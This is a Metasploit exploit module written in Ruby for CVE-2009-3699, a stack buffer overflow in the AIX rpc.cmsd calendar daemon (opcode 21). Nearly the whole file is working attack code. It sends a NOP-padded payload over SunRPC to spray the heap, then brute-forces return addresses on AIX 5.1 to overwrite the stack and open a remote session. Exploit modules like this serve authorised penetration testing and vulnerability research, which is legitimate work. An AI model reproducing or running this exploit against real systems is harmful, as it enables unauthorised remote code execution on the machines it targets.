1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SunRPC
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a buffer overflow vulnerability in opcode 21 handled by
19
          rpc.cmsd on AIX. By making a request with a long string passed to the first
20
          argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
21
          leads to arbitrary code execution.
22

23
          NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
24
          further attempts are not possible.
25
        },
26
        'Author' => [
27
          'Rodrigo Rubira Branco (BSDaemon)',
28
          'jduck',
29
        ],
30
        'References' => [
31
          [ 'CVE', '2009-3699' ],
32
          [ 'OSVDB', '58726' ],
33
          [ 'BID', '36615' ],
34
          [ 'URL', 'https://web.archive.org/web/20091013155835/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
35
          [ 'URL', 'https://web.archive.org/web/20221204155746/http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
36
        ],
37
        'Payload' => {
38
          'Space' => 4104,
39
          'BadChars' => "\x00",
40
          # The RPC function splits the string by 0x40, watch out!
41
          # It's not a payload badchar since we're putting the payload elsewhere...
42
          'DisableNops' => true
43
        },
44
        'Targets' => [
45
          [
46
            'IBM AIX Version 5.1',
47
            {
48
              'Arch' => 'ppc',
49
              'Platform' => 'aix',
50
              'AIX' => '5.1',
51
              'Bruteforce' =>
52
              {
53
                'Start' => { 'Ret' => 0x2022dfc8 },
54
                # worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
55
                'Stop' => { 'Ret' => 0x202302c8 },
56
                'Step' => 600
57
              }
58
            }
59
          ],
60
        ],
61
        'DefaultTarget' => 0,
62
        'DisclosureDate' => '2009-10-07',
63
        'Notes' => {
64
          'Reliability' => [ UNRELIABLE_SESSION ],
65
          'Stability' => [ CRASH_SERVICE_RESTARTS ],
66
          'SideEffects' => [ IOC_IN_LOGS ]
67
        }
68
      )
69
    )
70
  end
71

72
  def brute_exploit(brute_target)
73
    if !@aixpayload
74
      datastore['AIX'] = target['AIX']
75
      @aixpayload = regenerate_payload.encoded
76
    end
77

78
    print_status('Trying to exploit rpc.cmsd with address 0x%x ...' % brute_target['Ret'])
79

80
    begin
81
      sunrpc_create('udp', 100068, 4)
82

83
      # spray the heap a bit (work around powerpc cache issues)
84
      buf = make_nops(1024 - @aixpayload.length)
85
      buf << @aixpayload
86
      xdr = Rex::Encoder::XDR.encode(buf, buf)
87
      10.times do
88
        sunrpc_call(7, xdr, 2)
89
      end
90

91
      # print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
92

93
      buf = rand_text_alphanumeric(payload_space)
94
      buf << [brute_target['Ret']].pack('N')
95

96
      xdr = Rex::Encoder::XDR.encode(buf, '')
97
      sunrpc_authunix('localhost', 0, 0, [])
98
      sunrpc_call(21, xdr, 2)
99

100
      handler(sunrpc_callsock)
101
      sunrpc_destroy
102
    rescue Rex::Proto::SunRPC::RPCTimeout
103
      vprint_error('RPCTimeout')
104
    rescue Rex::Proto::SunRPC::RPCError => e
105
      vprint_error(e.to_s)
106
    rescue EOFError
107
      vprint_error('EOFError')
108
    end
109
  end
110
end
111

112